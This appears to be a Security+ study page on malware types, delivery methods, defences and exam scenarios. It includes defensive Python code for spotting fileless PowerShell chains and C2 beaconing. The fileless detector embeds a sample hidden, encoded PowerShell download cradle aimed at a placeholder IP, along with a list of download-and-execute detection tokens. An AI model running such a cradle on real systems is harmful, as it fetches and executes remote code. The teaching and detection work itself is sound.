⚡ What is Malware?
Malware (malicious software) is any software designed to damage, disrupt, steal from, or gain unauthorised access to a system. The key distinctions the exam tests are how each type spreads (requires user action vs self-propagates), what it does (encrypts files, steals data, provides remote access, hides itself), and which defences apply. Knowing the difference between a virus and a worm, or a trojan and a RAT, is directly tested in Security+ scenario questions.

Core Malware Types

Virus
Requires Host File · User Action to Spread
A virus attaches itself to a legitimate file or program and executes when that file is opened or the program is run. It cannot spread on its own — it requires a user to execute the infected file or share it with another system. Viruses can corrupt files, delete data, or deliver a payload.
How it spreads
Infected files shared via email, USB, downloads — requires user execution
Key characteristic
Needs a host file. Inert until the infected program is run.
Defence
Antivirus / EDR, user education, email scanning, disable autorun
Exam distinction
Virus = needs host + user action. Worm = self-propagates without user.
Worm
Self-Replicating · No User Action Needed
A worm is self-replicating malware that spreads across networks without any user interaction. It exploits vulnerabilities in operating systems or network services to copy itself to other systems automatically. Worms can consume massive bandwidth and CPU resources through rapid replication, even if their payload is benign. WannaCry (2017) was a worm that spread via the EternalBlue SMB exploit (MS17-010).
How it spreads
Network vulnerabilities, open shares, exploits — no user action required
Key characteristic
Self-propagating. Can spread from a single infection to thousands of systems in minutes.
Defence
Patch management (closes exploited vulnerabilities), network segmentation, IDS/IPS
Exam distinction
Worm = no host needed, no user action, spreads itself. Virus = needs host file.
Trojan (Trojan Horse)
Disguised as Legitimate · User Installs It
A trojan disguises itself as legitimate software to trick users into installing it. Unlike viruses, trojans do not self-replicate — they rely on the user to run them. Once executed, the trojan delivers its payload: creating a backdoor, downloading additional malware, stealing credentials, or providing remote access. Named after the Greek myth — appears harmless, contains the real threat inside.
How it spreads
Social engineering — fake software, cracked applications, malicious email attachments
Key characteristic
Masquerades as legitimate. Does not self-replicate. User must be tricked into running it.
Defence
User education, application allowlisting, download from trusted sources only, antivirus
Exam distinction
Trojan = disguised, user-installed, no replication. RAT = a trojan that provides remote access.
Ransomware
Demands Payment · Encrypts Files
Ransomware encrypts the victim's files and demands payment (typically cryptocurrency) for the decryption key. Modern ransomware often uses a two-stage attack: exfiltrate data first (for double extortion — "pay or we publish your data"), then encrypt. Ransomware typically arrives via phishing email, RDP brute force, or exploited vulnerabilities. Offline, tested backups are the most effective defence — payment does not guarantee decryption.
How it spreads
Phishing email, compromised RDP (port 3389), drive-by downloads, worm propagation
Key characteristic
Encrypts files using asymmetric or hybrid encryption. Attacker holds the private key.
Defence
Offline backups (3-2-1 rule), patch management, disable RDP if unused, MFA, email filtering
Exam note
RAID is NOT a defence against ransomware: RAID provides disk-failure redundancy, not point-in-time copies, so the encrypted writes are applied to every member of the array just like any other write.
Rootkit
Deep System Access · Hides Itself
A rootkit provides an attacker with privileged (root/admin) access to a system while actively hiding its presence from the operating system, antivirus tools, and administrators. Kernel-level rootkits modify the OS kernel itself — making them extremely difficult to detect or remove. Bootkits are rootkits that infect the boot process (the master boot record (MBR) on legacy BIOS systems, or the UEFI bootloader/firmware on modern ones), loading before the OS. Detection requires booting from external trusted media and scanning offline.
How it spreads
Often delivered by trojans after initial compromise; requires privilege escalation to install
Key characteristic
Hides itself and other malware. Operates at kernel or firmware level. Survives reboots.
Defence / Removal
Boot from trusted external media, offline scanning, UEFI Secure Boot, full OS reinstall often required
Exam note
Standard antivirus running inside the infected OS cannot reliably detect rootkits — they intercept and hide themselves from the OS.
Spyware
Monitors User · Exfiltrates Data
Spyware secretly monitors user activity and transmits data to an attacker — browsing history, credentials, personal information, screenshots. It typically runs silently in the background with no visible interface. Often bundled with free software (PUPs — Potentially Unwanted Programs). Stalkerware is a category of spyware used for intimate partner surveillance.
How it spreads
Bundled with free downloads, drive-by downloads, PUPs, malicious browser extensions
Key characteristic
Silent surveillance. No visible presence. Continuously sends data to attacker-controlled server.
Defence
Anti-spyware/antivirus, careful download practices, browser extension audits, network monitoring for unusual outbound traffic
Exam distinction
Spyware = broad surveillance. Keylogger = specifically records keystrokes.
Keylogger
Records Keystrokes · Credential Theft
A keylogger records every keystroke typed on the keyboard — capturing passwords, credit card numbers, messages, and any other typed input. Software keyloggers run as background processes; hardware keyloggers are physical devices plugged between the keyboard and computer (used in targeted attacks on shared workstations). Logs are either stored locally (retrieved later) or transmitted in real time to the attacker.
Types
Software: runs as process, installed via trojan or spyware. Hardware: physical device between keyboard and USB port.
Key characteristic
Captures credentials at point of entry — bypasses encrypted connections because it captures before encryption.
Defence
MFA (keylogged password alone isn't enough), physical port inspection on shared machines, antivirus, virtual keyboard for sensitive entry
Exam note
MFA is the key defence — even if a password is stolen via keylogger, the second factor prevents access.
RAT — Remote Access Trojan
Full Remote Control · Persistent Backdoor
A RAT gives an attacker full remote control of an infected system — file access, webcam/microphone access, keylogging, command execution, lateral movement staging. RATs are delivered like trojans (disguised software), then establish a persistent covert channel back to the attacker's command-and-control (C2) server. Often used as the first foothold in an advanced persistent threat (APT) campaign.
How it spreads
Phishing, malicious attachments, trojanised software, drive-by downloads
Key characteristic
Persistent backdoor with full interactive access. Uses C2 infrastructure. Hard to detect because its outbound traffic is usually encrypted and blends in with normal HTTPS.
Defence
Egress filtering (outbound traffic monitoring), EDR/behavioural analysis, application allowlisting, network anomaly detection
Exam distinction
RAT = trojan + persistent remote control. All RATs are trojans; not all trojans are RATs.
Fileless Malware
No Files on Disk · Lives in Memory
Fileless malware runs its payload in memory (RAM) rather than as a malicious executable on disk, so traditional file-based antivirus scanners have nothing to scan. It typically abuses legitimate system tools — PowerShell, WMI (Windows Management Instrumentation), or the Windows registry — to execute malicious code. A fileless attack might arrive via a malicious document macro that launches PowerShell to download and execute code directly in memory; the lure document and powershell.exe are legitimate files on disk, but the malicious code itself never touches the filesystem.
How it spreads
Malicious macros, phishing links, exploit kits — initial vector writes nothing to disk
Key characteristic
Evades signature-based AV. Uses LOLBins (Living Off the Land Binaries) — legitimate Windows tools as weapons. Disappears on reboot (unless it adds persistence).
Defence
EDR with behavioural analysis, PowerShell constrained language mode, script block logging, disable macros, application control
Exam note
Traditional signature-based AV cannot reliably detect fileless malware: there is no file to match a signature against. Behavioural/heuristic analysis, script logging, or EDR is required.
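The defences listed for fileless malware (script block logging, EDR behavioural analysis) only help if someone turns the telemetry into a detection. The following is an added example, not code from the original page or from any vendor rule set, showing the triage a practitioner would write for the macro → PowerShell → in-memory payload chain described above. It models Sysmon-style process-creation events as plain dicts, decodes PowerShell's -EncodedCommand (base64 of UTF-16LE) so the hidden payload is inspected too, and flags Office-parent → script-host spawns and download-cradle tokens. The sample events, paths and the 203.0.113.5 address are constructed for this example.

```python
"""Triage of endpoint telemetry for the macro -> PowerShell -> in-memory payload chain.

Added example for this study page; not taken from any product or vendor rule set.
Process-creation events are modelled as dicts with the fields Sysmon Event ID 1 provides
(parent image, image, command line). The sample events below are constructed.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Download-cradle and in-memory execution tokens typical of fileless chains.
SUSPICIOUS_TOKENS = [
    r"\bIEX\b", r"Invoke-Expression", r"DownloadString", r"DownloadFile",
    r"Net\.WebClient", r"Invoke-WebRequest", r"FromBase64String",
    r"Reflection\.Assembly", r"-nop\b", r"-w(?:indowstyle)?\s+hidden",
]
TOKEN_RE = re.compile("|".join(SUSPICIOUS_TOKENS), re.IGNORECASE)
# -e / -enc / -EncodedCommand followed by a base64 blob (PowerShell decodes it as UTF-16LE).
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def suspicious_tokens(text):
    """Return the distinct suspicious tokens (lower-cased) found in a command line or script."""
    return sorted({m.group(0).lower() for m in TOKEN_RE.finditer(text)})


def basename(path):
    """Last path component, lower-cased, for either separator style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_process_event(ev):
    """Return the reasons an event looks like a fileless chain ([] = nothing found)."""
    reasons = []
    parent, image = basename(ev["parent_image"]), basename(ev["image"])
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"office parent {parent} spawned script host {image}")
    text = ev["command_line"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded command line")
        text += " " + decoded  # inspect the decoded payload as well as the visible command line
    hits = suspicious_tokens(text)
    if hits:
        reasons.append("suspicious tokens: " + ", ".join(hits))
    return reasons


def triage(events):
    """Map event index -> reasons for every event that scored at least one reason."""
    result = {}
    for i, ev in enumerate(events):
        reasons = score_process_event(ev)
        if reasons:
            result[i] = reasons
    return result


# Constructed sample telemetry: a macro-launched download cradle and a routine admin script.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
ENCODED_CRADLE = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + ENCODED_CRADLE},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: " + "; ".join(reasons))
```

The second sample event is a legitimate scheduled script launched from Explorer and scores nothing, which is the point of pairing the parent-process check with token matching: PowerShell itself is not the indicator, the Office parent plus a hidden, encoded download cradle is. Real deployments feed the same token list over script block logs (Event ID 4104), which capture the de-obfuscated script even when the command line is clean.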
Botnet / Bot
C2 Controlled · Network of Infected Hosts
A botnet is a network of compromised computers (bots or zombies) controlled remotely by an attacker via a command-and-control (C2) server. Each infected machine receives instructions from the C2 — launch a DDoS attack, send spam, mine cryptocurrency, or spread additional malware. The bot owner (botmaster) can rent botnet access to other criminals. Individual bots are infected via worms, trojans, or drive-by downloads and often show no obvious symptoms.
Used for
DDoS attacks, spam campaigns, credential stuffing, click fraud, cryptocurrency mining
Key characteristic
C2 infrastructure. Infected machines follow attacker commands. Hard to detect — often low CPU/bandwidth use per bot.
Defence
Patch management, antivirus/EDR, network monitoring for C2 beacon traffic, DNS sinkholing
Exam note
DDoS attacks often use botnets — thousands of bots flood a target simultaneously. Mitigated by rate limiting, CDNs, and scrubbing centres.
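Both the RAT card (egress filtering, network anomaly detection) and the botnet card (monitoring for C2 beacon traffic) point at the same network-side detection: an implant that sleeps a fixed interval between check-ins produces connections that are far more regular than anything a human generates. The following is an added example, not code from the original page or any vendor product, that scores outbound flow records for that regularity using the coefficient of variation of the gaps between connections. The record shape, hosts and addresses are constructed for the example (198.51.100.0/24 and 203.0.113.0/24 are documentation ranges).

```python
"""Periodic-beacon detection over constructed outbound flow records.

Added example for this study page (not a vendor or project detection rule).
Each record is (timestamp_s, src_ip, dst_ip, dst_port, bytes_sent), the shape of a
NetFlow or Zeek conn summary. All hosts and addresses below are constructed.
"""
from collections import defaultdict
from statistics import mean, pstdev


def beacon_candidates(records, min_connections=8, max_cv=0.15):
    """Return (src, dst, port) pairs whose connections recur at a near-fixed interval.

    Regularity is the coefficient of variation (stdev / mean) of the gaps between
    consecutive connections. A bot or RAT sleeping N seconds between check-ins gives a
    CV near zero; human-driven traffic is bursty and scores far higher.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, port, nbytes in records:
        by_pair[(src, dst, port)].append((ts, nbytes))

    findings = []
    for pair, flows in by_pair.items():
        if len(flows) < min_connections:      # too few samples to judge periodicity
            continue
        flows.sort()
        gaps = [later[0] - earlier[0] for earlier, later in zip(flows, flows[1:])]
        avg_gap = mean(gaps)
        if avg_gap <= 0:                      # duplicate timestamps; nothing to measure
            continue
        cv = pstdev(gaps) / avg_gap
        if cv <= max_cv:
            findings.append({
                "pair": pair,
                "connections": len(flows),
                "mean_interval_s": round(avg_gap, 1),
                "interval_cv": round(cv, 3),
                "mean_bytes": round(mean(n for _, n in flows)),
            })
    return findings


def make_flows(start, src, dst, port, gaps, sizes):
    """Build records from a start time, the gaps (seconds) between connections and their sizes."""
    records, ts = [(start, src, dst, port, sizes[0])], start
    for gap, size in zip(gaps, sizes[1:]):
        ts += gap
        records.append((ts, src, dst, port, size))
    return records


# Constructed sample: a bot checking in about once a minute, and a user browsing a website.
BEACON_GAPS = [60, 62, 59, 61, 60, 58, 61, 60, 59, 62, 60]
BROWSING_GAPS = [3, 140, 7, 900, 22, 65, 2, 410, 18]
SAMPLE_FLOWS = (
    make_flows(1_700_000_000, "10.0.0.15", "198.51.100.23", 443, BEACON_GAPS, [512] * 12)
    + make_flows(1_700_000_030, "10.0.0.15", "203.0.113.10", 443, BROWSING_GAPS,
                 [1480, 320, 9100, 2200, 640, 5300, 410, 12000, 880, 1500])
)

if __name__ == "__main__":
    for finding in beacon_candidates(SAMPLE_FLOWS):
        print(finding)
```

Treat a hit as a triage signal, not a verdict: update checks, monitoring agents and NTP also beacon regularly, so the destination should be compared against an allowlist, reputation data and DNS sinkhole logs before anyone calls it C2. Conversely, C2 frameworks add deliberate jitter to their sleep, which raises the CV; that is why the threshold is a parameter and why analysts also look at the consistent small request sizes the example records alongside the interval.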
Adware & PUP
Unwanted Ads · Privacy Risk
Adware displays unwanted advertisements, often by injecting ads into browsers or redirecting searches. Potentially Unwanted Programs (PUPs) are software that users technically agreed to install (buried in licence agreements) but wouldn't want if they understood what was being installed — toolbars, browser hijackers, fake optimisers. Not always malicious but degrade performance and privacy.
How it spreads
Bundled with free software installs, fake "update" prompts, deceptive download buttons
Defence
Ad blockers, careful installation (decline additional software), antivirus/anti-adware tools, browser extension audit
⚡ The most tested malware distinctions

Virus vs Worm: Virus needs a host file and user action to spread. Worm self-propagates across networks with no user action. Worms are faster spreading and often cause more collateral damage through bandwidth consumption.

Trojan vs RAT: All RATs are trojans (disguised as something legitimate), but not all trojans are RATs. A RAT specifically provides persistent interactive remote control. A trojan might just install a keylogger or create a backdoor without interactive access.

Rootkit detection: You cannot reliably detect a rootkit from inside the infected OS — it intercepts OS calls and hides itself. Must boot from external trusted media to scan offline.

Ransomware vs backup: RAID is not a defence against ransomware (mirrors replicate the encryption). Offline, air-gapped backups that are tested regularly are the only reliable defence against data loss from ransomware.

Malware Delivery Methods

Delivery Method | How It Works | Malware Types Delivered
Phishing Email | Malicious attachment (macro-enabled document, executable) or link to drive-by download site | Ransomware, trojans, RATs, keyloggers, fileless malware
Drive-by Download | Visiting a compromised or malicious website triggers an automatic download exploiting browser or plugin vulnerability | Spyware, adware, trojans, ransomware
Malicious USB / Media | Infected USB drive left in a car park (baiting); autorun executes malware on plug-in | Worms (autorun), trojans, RATs
Software Supply Chain | Legitimate software is compromised before distribution — SolarWinds attack (2020) is the canonical example | Trojans, RATs, backdoors
Exploit / Vulnerability | Unpatched vulnerability exploited directly — no user interaction required if the service is exposed | Worms, rootkits, ransomware (via RDP)
Watering Hole | Attacker compromises a website the target is known to visit — executes drive-by download when victim visits | RATs, trojans, spyware

Malware Defences

Layered defence — defence in depth

Antivirus / EDR: Signature-based AV catches known malware; EDR (Endpoint Detection and Response) adds behavioural analysis for unknown/fileless malware. EDR is the modern standard.

Patch management: Most worms and drive-by downloads exploit known, patched vulnerabilities. Keeping systems patched eliminates most of the attack surface.

User education: Phishing delivers most malware — training users to recognise phishing is the highest-ROI defence against trojans, ransomware, and RATs.

Least privilege: Limits the damage malware can do — malware running as a standard user cannot install kernel-level rootkits or modify system files.

Network segmentation: Limits lateral movement and worm propagation — a worm that infects one segment cannot reach systems on isolated segments.

Offline backups (3-2-1): Three copies, two different media, one off-site/offline. The only reliable defence against ransomware data loss.


Exam Scenarios

💬 "Malware spread across an entire office network within minutes of a single infection, without any users opening files or clicking links. What type of malware is this?" → Worm — self-propagating malware that spreads across networks exploiting vulnerabilities without user interaction.
💬 "A user downloads what appears to be a free game. After installation, the attacker has full remote access to the computer. What type of malware is this?" → RAT (Remote Access Trojan) — disguised as legitimate software, delivered via social engineering, provides persistent remote control.
💬 "An administrator cannot find any malware files on disk but the SIEM shows suspicious PowerShell activity and unusual outbound connections. What type of attack is suspected?" → Fileless malware — operates in memory using legitimate tools (PowerShell), leaves no files on disk, evades signature-based AV.
💬 "All files on a company's file server have been encrypted and a ransom note demands Bitcoin payment. The company had RAID 5 on the server. Is the data recoverable without paying?" → RAID does not protect against ransomware: RAID 5 gives disk-failure redundancy, not a point-in-time copy, so the encrypted data was written across all array members like any other write. Recovery depends on offline backups. RAID is not a backup.
💬 "Antivirus running on an infected computer reports no threats, but external scanning from a boot disk finds a rootkit. Why did the installed AV miss it?" → Rootkits operate at kernel level and intercept OS calls — they hide themselves from software running on the infected OS, including antivirus. Only offline scanning from trusted external media can reliably detect them.
💬 "A keylogger has captured a user's password. What security control would prevent the attacker from using the stolen password?" → MFA (Multi-Factor Authentication) — the stolen password alone is insufficient without the second factor (authenticator app, SMS, hardware token).
💬 "What is the key difference between a virus and a worm?" → A virus requires a host file and user action to spread. A worm is self-propagating — it spreads automatically across networks without user involvement, exploiting vulnerabilities directly.
💬 "A botnet is being used to flood a website with traffic. What type of attack is this, and what is each infected machine called?" → DDoS (Distributed Denial of Service) attack. Each infected machine is called a bot or zombie. The attacker controls them via a C2 (command-and-control) server.
